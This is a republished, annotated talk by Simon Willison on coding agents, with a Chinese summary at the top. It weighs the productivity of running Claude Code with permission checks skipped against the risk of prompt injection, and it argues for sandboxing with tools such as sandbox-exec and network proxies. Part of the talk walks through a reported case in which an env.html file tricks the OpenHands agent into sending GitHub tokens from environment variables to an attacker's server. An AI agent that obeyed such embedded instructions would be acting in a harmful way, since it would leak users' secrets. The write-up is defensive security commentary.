https://simonwillison.net/atom/everything 10月22日 20:24
Coding agents: 自由与风险的权衡
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

本文探讨了在使用强大的AI编码助手时,如何在最大化其效率与防范潜在风险之间取得平衡。作者分享了在“YOLO模式”(即跳过权限检查)下使用Claude Code取得的显著成果,例如独立完成复杂项目。然而,他也深刻阐述了这种模式带来的严峻挑战,特别是“提示注入”攻击,以及“致命三连”(私有数据、不可信内容、外部通信)可能导致的严重数据泄露。文章强调,沙盒化是解决这些风险的根本途径,并介绍了利用`sandbox-exec`等工具实现安全编码环境的方案,鼓励用户在确保安全的前提下,大胆探索AI的潜力。

🚀 **“YOLO模式”下的高效开发:** 文章作者详细阐述了在“YOLO模式”(即`--dangerously-skip-permissions`)下使用Claude Code所带来的巨大效率提升。通过允许AI在几乎无限制的环境中运行,作者得以在短时间内独立完成多个复杂项目,例如在NVIDIA Spark上部署DeepSeek-OCR模型,以及在WebAssembly沙箱中运行Python代码。这种模式将AI从需要频繁干预的工具转变为可以自主解决难题的助手,让用户能同时处理多项任务,极大地扩展了工作能力。

⚠️ **“提示注入”与“致命三连”的风险:** 作者深入剖析了“YOLO模式”所伴随的严重安全隐患。核心问题在于“提示注入”攻击,即恶意输入诱导AI执行非预期操作。当AI同时拥有访问私有数据、处理不可信内容和进行外部通信的能力时,就构成了“致命三连”,攻击者可能借此窃取敏感信息,如API密钥。文章强调,任何能够将令牌(tokens)注入AI上下文的实体,都应被视为拥有对AI行为的完全控制权。

🛡️ **沙盒化是关键的安全策略:** 文章明确指出,仅依靠AI检测攻击是不可靠的,唯一可行的安全解决方案是运行AI代理于沙盒环境中。理想的沙盒是运行在他人计算机上的服务,以最小化对自身环境的影响。作者推荐了多种沙盒方案,包括云端AI服务(如OpenAI Codex Cloud, Claude Code for the web)以及本地的代码解释器功能。其中,利用macOS的`sandbox-exec`命令,并结合HTTP代理来控制网络连接,被认为是控制文件访问和网络通信的有效手段,能够有效阻止数据外泄。

Living dangerously with Claude

22nd October 2025

I gave a talk last night at Claude Code Anonymous in San Francisco, the unofficial meetup for coding agent enthusiasts. I decided to talk about a dichotomy I’ve been struggling with recently. On the one hand I’m getting enormous value from running coding agents with as few restrictions as possible. On the other hand I’m deeply concerned by the risks that accompany that freedom.

Below is a copy of my slides, plus additional notes and links as an annotated presentation.

#

I’m going to be talking about two things this evening...

#

Why you should always use --dangerously-skip-permissions. (This got a cheer from the room full of Claude Code enthusiasts.)

#

And why you should never use --dangerously-skip-permissions. (This did not get a cheer.)

#

--dangerously-skip-permissions is a bit of a mouthful, so I’m going to use its better name, “YOLO mode”, for the rest of this presentation.

Claude Code running in this mode genuinely feels like a completely different product from regular, default Claude Code.

The default mode requires you to pay constant attention to it, tracking everything it does and actively approving changes and actions every few steps.

In YOLO mode you can leave Claude alone to solve all manner of hairy problems while you go and do something else entirely.

I have a suspicion that many people who don’t appreciate the value of coding agents have never experienced YOLO mode in all of its glory.

I’ll show you three projects I completed with YOLO mode in just the past 48 hours.

#

I wrote about this one at length in Getting DeepSeek-OCR working on an NVIDIA Spark via brute force using Claude Code.

I wanted to try the newly released DeepSeek-OCR model on an NVIDIA Spark, but doing so requires figuring out how to run a model using PyTorch and CUDA, which is never easy and is a whole lot harder on an ARM64 device.

I SSHd into the Spark, started a fresh Docker container and told Claude Code to figure it out. It took 40 minutes and three additional prompts but it solved the problem, and I got to have breakfast and tinker with some other projects while it was working.

#

This project started out in Claude Code for the web. I’m eternally interested in options for running Python code inside a WebAssembly sandbox, for all kinds of reasons. I decided to see if the Claude iPhone app could launch a task to figure it out.

I decided to see how hard it was to do that using Pyodide running directly in Node.js.

Claude Code got it working and built and tested this demo script showing how to do it.

I started a new simonw/research repository to store the results of these experiments, each one in a separate folder. It’s up to 5 completed research projects already and I created it less than 2 days ago.

#

Here’s my favorite, a project from just this morning.

I decided I wanted to try out SLOCCount, a 2001-era Perl tool for counting lines of code and estimating the cost to develop them using 2001 USA developer salaries.

.. but I didn’t want to run Perl, so I decided to have Claude Code (for web, and later on my laptop) try and figure out how to run Perl scripts in WebAssembly.

TLDR: it got there in the end! It turned out some of the supporting scripts in SLOCCount were written in C, so it had to compile those to WebAssembly as well.

And now tools.simonwillison.net/sloccount is a browser-based app which runs 25-year-old Perl+C in WebAssembly against pasted code, GitHub repository references and even zip files full of code.

#

The wild thing is that all three of these projects weren’t even a priority for me—they were side quests, representing pure curiosity that I could outsource to Claude Code and solve in the background while I was occupied with something else.

I got a lot of useful work done in parallel to these three flights of fancy.

#

But there’s a reason --dangerously-skip-permissions has that scary name. It’s dangerous to use Claude Code (and other coding agents) in this way!

#

The reason for this is prompt injection, a term I coined three years ago to describe a class of attacks against LLMs that take advantage of the way untrusted content is concatenated together with trusted instructions.

(It’s named after SQL injection which shares a similar shape.)

This remains an incredibly common vulnerability.

#

Here’s a great example of a prompt injection attack against a coding agent, described by Johann Rehberger as part of his Month of AI Bugs, sharing a new prompt injection report every day for the month of August.

If a coding agent—in this case OpenHands— reads this env.html file it can be tricked into grepping the available environment variables for hp_ (matching GitHub Personal Access Tokens) and sending that to the attacker’s external server for “help debugging these variables”.

#

I coined another term to try and describe a common subset of prompt injection attacks: the lethal trifecta.

Any time an LLM system combines access to private data with exposure to untrusted content and the ability to externally communicate, there’s an opportunity for attackers to trick the system into leaking that private data back to them.

These attacks are incredibly common. If you’re running YOLO coding agents with access to private source code or secrets (like API keys in environment variables) you need to be concerned about the potential of these attacks.

#

This is the fundamental rule of prompt injection: anyone who can get their tokens into your context should be considered to have full control over what your agent does next, including the tools that it calls.

#

Some people will try to convince you that prompt injection attacks can be solved using more AI to detect the attacks. This does not work 100% reliably, which means it’s not a useful security defense at all.

The only solution that’s credible is to run coding agents in a sandbox.

#

The best sandboxes are the ones that run on someone else’s computer! That way the worst that can happen is someone else’s computer getting owned.

You still need to worry about your source code getting leaked. Most of my stuff is open source anyway, and a lot of the code I have agents working on is research code with no proprietary secrets.

If your code really is sensitive you need to consider network restrictions more carefully, as discussed in a few slides.

#

There are lots of great sandboxes that run on other people’s computers. OpenAI Codex Cloud, Claude Code for the web, Gemini Jules are all excellent solutions for this.

I also really like the code interpreter features baked into the ChatGPT and Claude consumer apps.

#

There are two problems to consider with sandboxing.

The first is easy: you need to control what files can be read and written on the filesystem.

The second is much harder: controlling the network connections that can be made by code running inside the agent.

#

The reason network access is so important is that it represents the data exfiltration leg of the lethal trifecta. If you can prevent external communication back to an attacker they can’t steal your private information, even if they manage to sneak in their own malicious instructions.

#

Claude Code CLI grew a new sandboxing feature just yesterday, and Anthropic released an a new open source library showing how it works.

#

The key to the implementation—at least on macOS—is Apple’s little known but powerful sandbox-exec command.

This provides a way to run any command in a sandbox configured by a policy document.

Those policies can control which files are visible but can also allow-list network connections. Anthropic run an HTTP proxy and allow the Claude Code environment to talk to that, then use the proxy to control which domains it can communicate with.

(I used Claude itself to synthesize this example from Anthropic’s codebase.)

#

... the bad news is that sandbox-exec has been marked as deprecated in Apple’s documentation since at least 2017!

It’s used by Codex CLI too, and is still the most convenient way to run a sandbox on a Mac. I’m hoping Apple will reconsider.

#

So go forth and live dangerously!

(But do it in a sandbox.)

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

AI Claude Code Coding Agents Prompt Injection Sandboxing Security YOLO Mode 人工智能 代码助手 安全 沙盒
相关文章